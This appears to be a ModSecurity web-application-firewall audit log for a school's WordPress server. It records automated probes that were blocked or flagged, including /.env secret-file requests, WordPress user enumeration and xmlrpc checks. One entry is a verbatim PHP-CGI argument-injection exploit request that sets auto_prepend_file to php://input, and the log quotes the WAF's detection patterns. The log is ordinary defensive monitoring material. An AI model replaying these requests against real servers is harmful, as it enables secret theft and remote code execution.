X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.99.61
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--749b9b1f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--749b9b1f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746091483121513 3519 (- - -)
Stopwatch2: 1746091483121513 3519; combined=1519, p1=542, p2=945, p3=0, p4=0, p5=31, sr=131, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--749b9b1f-Z--
--df31831d-A--
[01/May/2025:16:24:46 +0700] aBM93igtr0Qsi1mFAsN4AwAAAIo 103.236.140.4 41430 103.236.140.4 8181
--df31831d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.99.61
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.99.61
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--df31831d-C--
demo.sayHello
--df31831d-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--df31831d-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746091486001923 6161 (- - -)
Stopwatch2: 1746091486001923 6161; combined=4506, p1=598, p2=3676, p3=32, p4=34, p5=97, sr=129, sw=69, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--df31831d-Z--
--da0e2940-A--
[01/May/2025:16:24:47 +0700] aBM934144kZ4LAGlEgxvfQAAANA 103.236.140.4 41440 103.236.140.4 8181
--da0e2940-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 107.170.39.9
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 107.170.39.9
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--da0e2940-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da0e2940-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746091487490999 790 (- - -)
Stopwatch2: 1746091487490999 790; combined=367, p1=322, p2=0, p3=0, p4=0, p5=44, sr=132, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da0e2940-Z--
--809d5500-A--
[01/May/2025:18:14:39 +0700] aBNXn-VeTgVPHjrSAYCdLQAAABg 103.236.140.4 39238 103.236.140.4 8181
--809d5500-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.106.55
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.106.55
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--809d5500-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--809d5500-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746098079777287 3060 (- - -)
Stopwatch2: 1746098079777287 3060; combined=1299, p1=419, p2=847, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--809d5500-Z--
--04f6e655-A--
[01/May/2025:18:14:42 +0700] aBNXouVeTgVPHjrSAYCdLwAAAA4 103.236.140.4 39254 103.236.140.4 8181
--04f6e655-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.106.55
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.106.55
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--04f6e655-C--
demo.sayHello
--04f6e655-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--04f6e655-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746098082691359 5174 (- - -)
Stopwatch2: 1746098082691359 5174; combined=3600, p1=466, p2=2945, p3=27, p4=30, p5=77, sr=59, sw=55, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--04f6e655-Z--
--388a9e12-A--
[01/May/2025:18:14:46 +0700] aBNXpuVeTgVPHjrSAYCdMgAAAAQ 103.236.140.4 39270 103.236.140.4 8181
--388a9e12-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.176.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.176.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--388a9e12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--388a9e12-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746098086646241 2990 (- - -)
Stopwatch2: 1746098086646241 2990; combined=1289, p1=419, p2=840, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--388a9e12-Z--
--19ea9539-A--
[01/May/2025:18:14:48 +0700] aBNXqMVMAgMJpNzaVtIndgAAAFM 103.236.140.4 39282 103.236.140.4 8181
--19ea9539-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.176.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.176.194
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--19ea9539-C--
demo.sayHello
--19ea9539-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--19ea9539-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746098088833390 5807 (- - -)
Stopwatch2: 1746098088833390 5807; combined=4301, p1=534, p2=3539, p3=29, p4=31, p5=100, sr=71, sw=68, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--19ea9539-Z--
--8ac1c303-A--
[01/May/2025:18:18:47 +0700] aBNYl4144kZ4LAGlEgx24QAAAMg 103.236.140.4 40334 103.236.140.4 8181
--8ac1c303-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.74.150
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.74.150
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--8ac1c303-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ac1c303-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746098327854806 2851 (- - -)
Stopwatch2: 1746098327854806 2851; combined=1251, p1=433, p2=783, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ac1c303-Z--
--476c612b-A--
[01/May/2025:18:18:50 +0700] aBNYmsVMAgMJpNzaVtInvwAAAEc 103.236.140.4 40350 103.236.140.4 8181
--476c612b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.74.150
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.74.150
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--476c612b-C--
demo.sayHello
--476c612b-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--476c612b-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746098330617735 5826 (- - -)
Stopwatch2: 1746098330617735 5826; combined=4729, p1=596, p2=3892, p3=39, p4=44, p5=94, sr=76, sw=64, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--476c612b-Z--
--0749fe59-A--
[01/May/2025:18:23:00 +0700] aBNZlOVeTgVPHjrSAYCd-wAAAAg 103.236.140.4 41294 103.236.140.4 8181
--0749fe59-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 154.94.13.3
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.94.13.3
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--0749fe59-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0749fe59-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746098580673482 2701 (- - -)
Stopwatch2: 1746098580673482 2701; combined=1400, p1=457, p2=912, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0749fe59-Z--
--08ef4144-A--
[01/May/2025:18:23:05 +0700] aBNZmY144kZ4LAGlEgx3GgAAAM8 103.236.140.4 41318 103.236.140.4 8181
--08ef4144-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 154.94.13.3
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.94.13.3
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--08ef4144-C--
demo.sayHello
--08ef4144-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--08ef4144-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746098585670234 4990 (- - -)
Stopwatch2: 1746098585670234 4990; combined=3886, p1=444, p2=3229, p3=29, p4=25, p5=92, sr=66, sw=67, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--08ef4144-Z--
--fcb0ed0e-A--
[01/May/2025:19:46:06 +0700] aBNtDuVeTgVPHjrSAYCjSwAAABA 103.236.140.4 60420 103.236.140.4 8181
--fcb0ed0e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.85.234
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.85.234
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Charset: utf-8
--fcb0ed0e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fcb0ed0e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746103566929468 763 (- - -)
Stopwatch2: 1746103566929468 763; combined=365, p1=331, p2=0, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fcb0ed0e-Z--
--bfe4492f-A--
[01/May/2025:21:13:50 +0700] aBOBnuVeTgVPHjrSAYCw-AAAABM 103.236.140.4 43712 103.236.140.4 8181
--bfe4492f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 194.163.159.240
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 194.163.159.240
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept-Charset: utf-8
--bfe4492f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bfe4492f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746108830126021 824 (- - -)
Stopwatch2: 1746108830126021 824; combined=389, p1=349, p2=0, p3=0, p4=0, p5=40, sr=150, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bfe4492f-Z--
--5c345e33-A--
[01/May/2025:21:14:23 +0700] aBOBv-VeTgVPHjrSAYCxLAAAAAg 103.236.140.4 44230 103.236.140.4 8181
--5c345e33-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 194.163.159.240
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 194.163.159.240
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65
Accept-Charset: utf-8
--5c345e33-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5c345e33-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746108863429740 536 (- - -)
Stopwatch2: 1746108863429740 536; combined=207, p1=177, p2=0, p3=0, p4=0, p5=30, sr=48, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5c345e33-Z--
--a31a0910-A--
[01/May/2025:21:32:25 +0700] aBOF-eVeTgVPHjrSAYC3fQAAAAI 103.236.140.4 60664 103.236.140.4 8181
--a31a0910-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 107.170.39.9
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 107.170.39.9
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--a31a0910-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a31a0910-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746109945701200 766 (- - -)
Stopwatch2: 1746109945701200 766; combined=359, p1=322, p2=0, p3=0, p4=0, p5=36, sr=109, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a31a0910-Z--
--7ec5ae44-A--
[02/May/2025:02:19:21 +0700] aBPJOSgtr0Qsi1mFAsOmSQAAAIw 103.236.140.4 50282 103.236.140.4 8181
--7ec5ae44-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.144
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.144
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Charset: utf-8
--7ec5ae44-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7ec5ae44-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746127161632509 673 (- - -)
Stopwatch2: 1746127161632509 673; combined=296, p1=254, p2=0, p3=0, p4=0, p5=42, sr=58, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ec5ae44-Z--
--7da6f626-A--
[02/May/2025:02:56:57 +0700] aBPSCcVMAgMJpNzaVtJYxgAAAEA 103.236.140.4 58934 103.236.140.4 8181
--7da6f626-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
--7da6f626-C--
--7da6f626-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7da6f626-E--
--7da6f626-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746129417255316 3753 (- - -)
Stopwatch2: 1746129417255316 3753; combined=2578, p1=472, p2=2070, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7da6f626-Z--
--93fab063-A--
[02/May/2025:03:24:23 +0700] aBPYd_NNWdC6CAybkqPzEAAAANM 103.236.140.4 43222 103.236.140.4 8181
--93fab063-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; i1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36
Accept-Charset: utf-8
--93fab063-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
